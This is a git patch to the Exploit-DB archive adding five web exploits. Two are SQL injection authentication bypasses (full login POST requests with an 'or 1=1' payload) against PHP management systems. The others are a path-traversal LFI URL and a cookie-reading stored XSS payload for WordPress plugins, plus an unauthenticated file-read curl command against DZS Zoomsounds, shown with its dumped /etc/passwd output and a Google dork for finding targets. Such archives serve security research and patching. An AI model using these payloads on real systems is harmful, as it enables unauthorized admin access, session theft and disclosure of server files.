From 34c9d56d78fe575bd409ab4b959b55a1ba0837f1 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 4 Dec 2021 05:02:12 +0000
Subject: [PATCH] DB: 2021-12-04

5 changes to exploits/shellcodes

Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass
Online Magazine Management System 1.0 - SQLi Authentication Bypass
WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)
WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)
WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)
---
 exploits/php/webapps/50560.txt | 37 +++++++++++++++++++
 exploits/php/webapps/50561.txt | 35 ++++++++++++++++++
 exploits/php/webapps/50562.txt | 13 +++++++
 exploits/php/webapps/50563.txt | 19 ++++++++++
 exploits/php/webapps/50564.txt | 66 ++++++++++++++++++++++++++++++++++
 files_exploits.csv             |  5 +++
 6 files changed, 175 insertions(+)
 create mode 100644 exploits/php/webapps/50560.txt
 create mode 100644 exploits/php/webapps/50561.txt
 create mode 100644 exploits/php/webapps/50562.txt
 create mode 100644 exploits/php/webapps/50563.txt
 create mode 100644 exploits/php/webapps/50564.txt

diff --git a/exploits/php/webapps/50560.txt b/exploits/php/webapps/50560.txt
new file mode 100644
index 000000000..ac594ad41
--- /dev/null
+++ b/exploits/php/webapps/50560.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Online Pre-owned/Used Car Showroom Management System 1.0 -  SQLi Authentication Bypass
+# Date: 01-12-2021
+# Exploit Author: Mohamed habib Smidi (Craniums)
+# Vendor Homepage: https://www.sourcecodester.com/php/15067/online-pre-ownedused-car-showroom-management-system-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/used_car_showroom.zip
+# Version: 1.0
+# Tested on: Ubuntu
+
+# Description :
+
+Admin panel authentication can be bypassed due to SQL injection vulnerability in the login form.
+
+# Request :
+
+POST /used_car_showroom/classes/Login.php?f=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0)
+Gecko/20100101 Firefox/93.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 49
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/used_car_showroom/admin/login.php
+Cookie: PHPSESSID=v0h6049m9ppunsh8vtfc8oj4p5
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+
+username='+or+1%3D1+limit+1+--+-%2B&password=aaaa
+
+--
\ No newline at end of file
diff --git a/exploits/php/webapps/50561.txt b/exploits/php/webapps/50561.txt
new file mode 100644
index 000000000..bc207ccd9
--- /dev/null
+++ b/exploits/php/webapps/50561.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Online Magazine Management System 1.0 -  SQLi Authentication Bypass
+# Date: 01-12-2021
+# Exploit Author: Mohamed habib Smidi (Craniums)
+# Vendor Homepage: https://www.sourcecodester.com/php/15061/online-magazine-management-system-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/magazines_0.zip
+# Version: 1.0
+# Tested on: Ubuntu
+
+
+# Description :
+
+Admin panel authentication can be bypassed due to SQL injection vulnerability in the login form.
+
+# Request :
+
+POST /magazines/classes/Login.php?f=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0)
+Gecko/20100101 Firefox/93.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 49
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/magazines/admin/login.php
+Cookie: PHPSESSID=863plvf7rpambpkmk2cipijgra
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+
+username='+or+1%3D1+limit+1+--+-%2B&password=aaaa
\ No newline at end of file
diff --git a/exploits/php/webapps/50562.txt b/exploits/php/webapps/50562.txt
new file mode 100644
index 000000000..ef05bca5f
--- /dev/null
+++ b/exploits/php/webapps/50562.txt
@@ -0,0 +1,13 @@
+# Exploit Title: WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)
+# Exploit Author: Mohamed Magdy Abumusilm Aka m19o
+# Software: All-in-One Video Gallery plugin
+# Version: <= 2.4.9
+# Tested on: Windows,linux
+
+Poc: https://example.com/wordpress/wp-admin/admin.php?page=all-in-one-video-gallery&tab=../../../../../poc
+
+Decription : Authenticated user can exploit LFI vulnerability in tab parameter.
+
+Vulnerable code block : https://i.ibb.co/hXRcSQp/1123.png
+
+You can find a writeup at my blog : https://m19o.github.io/posts/How-i-found-my-first-0day/
\ No newline at end of file
diff --git a/exploits/php/webapps/50563.txt b/exploits/php/webapps/50563.txt
new file mode 100644
index 000000000..c7effcf44
--- /dev/null
+++ b/exploits/php/webapps/50563.txt
@@ -0,0 +1,19 @@
+# Exploit Title: WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)
+# Date: 02/12/2021
+# Exploit Author: Abdurrahman Erkan (@erknabd)
+# Vendor Homepage: https://soliloquywp.com/
+# Software Link: https://wordpress.org/plugins/soliloquy-lite/
+# Version: 2.6.2
+# Tested on: Kali Linux 2021 - Firefox 78.7, Windows 10 - Brave 1.32.113, WordPress 5.8.2
+
+# Proof of Concept:
+#
+# 1- Install and activate the Slider by Soliloquy 2.6.2 plugin.
+# 2- Open Soliloquy and use "Add New" button to add new post.
+# 3- Add payload to title. Payload: <script>alert(document.cookie)</script>
+# 4- Add any image in post.
+# 5- Publish the post.
+# 6- XSS has been triggered.
+#
+# Go to this url "http://localhost/wp-admin/post.php?post=1&action=edit" XSS will trigger. - For wordpress users.
+# Go to this url "http://localhost/?post_type=soliloquy&p=1" XSS will trigger. - For normal users.
\ No newline at end of file
diff --git a/exploits/php/webapps/50564.txt b/exploits/php/webapps/50564.txt
new file mode 100644
index 000000000..e18358c19
--- /dev/null
+++ b/exploits/php/webapps/50564.txt
@@ -0,0 +1,66 @@
+# Exploit Title: WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)
+# Google Dork: inurl:/wp-content/plugins/dzs-zoomsounds/
+# Date: 2/12/2021
+# Exploit Author: Uriel Yochpaz
+# Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/
+# Software Link:
+# Version: 1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30, 2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10, 3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03, 5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45
+# Tested on: Linux (DZS Zoomsounds version 5.82)
+# CVE : CVE-2021-39316
+
+The vulnerability allows a remote attacker to perform directory traversal attacks.
+The vulnerability exists due to input validation error when processing directory traversal sequences in the "link" parameter in the "dzsap_download" action. A remote attacker can send a specially crafted HTTP request and read arbitrary files on the system.
+
+Mitigation:
+Install update from vendor's website.
+
+Vulnerable software versions ZoomSounds:
+1.10, 1.20, 1.30, 1.40, 1.41, 1.43, 1.45, 1.50, 1.51, 1.60, 1.61, 1.62, 1.63, 1.70, 2.00, 2.02, 2.10, 2.20, 2.30,
+2.42, 2.43, 2.44, 2.45, 2.46, 2.51, 2.60, 2.61, 2.62, 2.63, 2.64, 2.70, 2.72, 2.75, 3.00, 3.01, 3.03, 3.04, 3.10,
+3.12, 3.21, 3.23, 3.24, 3.30, 3.31, 3.32, 3.33, 3.40, 4.00, 4.10, 4.15, 4.20, 4.32, 4.47, 4.51, 4.63, 5.00, 5.03,
+5.04, 5.12, 5.18, 5.30, 5.31, 5.48, 5.60, 5.70, 5.82, 5.84, 5.91, 5.93, 5.95, 5.96, 6.00, 6.10, 6.21, 6.34, 6.45
+
+PoC:
+user@ubuntu:~$ curl "http://localhost/MYzoomsounds/?action=dzsap_download&link=../../../../../../../../../../etc/passwd"
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
+systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
+systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
+systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
+syslog:x:104:108::/home/syslog:/bin/false
+_apt:x:105:65534::/nonexistent:/bin/false
+messagebus:x:106:110::/var/run/dbus:/bin/false
+uuidd:x:107:111::/run/uuidd:/bin/false
+lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
+whoopsie:x:109:117::/nonexistent:/bin/false
+avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
+avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
+dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
+colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
+speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
+hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
+kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
+pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
+rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
+saned:x:119:127::/var/lib/saned:/bin/false
+usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
+user:x:1000:1000:user,,,:/home/user:/bin/bash
+mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 948e78a50..40fc72c29 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44646,5 +44646,10 @@ id,file,description,date,author,type,platform,port
 50554,exploits/multiple/webapps/50554.txt,"orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple,
 50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",1970-01-01,"Hubert Wojciechowski",webapps,php,
 50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php,
+50560,exploits/php/webapps/50560.txt,"Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mohamed habib Smidi",webapps,php,
 50557,exploits/php/webapps/50557.txt,"Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting",1970-01-01,"Tushar Jadhav",webapps,php,
 50559,exploits/php/webapps/50559.py,"Advanced Comment System 1.0 - Remote Command Execution (RCE)",1970-01-01,"Murillo Mejias",webapps,php,
+50561,exploits/php/webapps/50561.txt,"Online Magazine Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mohamed habib Smidi",webapps,php,
+50562,exploits/php/webapps/50562.txt,"WordPress Plugin All-in-One Video Gallery plugin 2.4.9 - Local File Inclusion (LFI)",1970-01-01,"Mohamed Magdy Abumusilm",webapps,php,
+50563,exploits/php/webapps/50563.txt,"WordPress Plugin Slider by Soliloquy 2.6.2 - 'title' Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Abdurrahman Erkan",webapps,php,
+50564,exploits/php/webapps/50564.txt,"WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Uriel Yochpaz",webapps,php,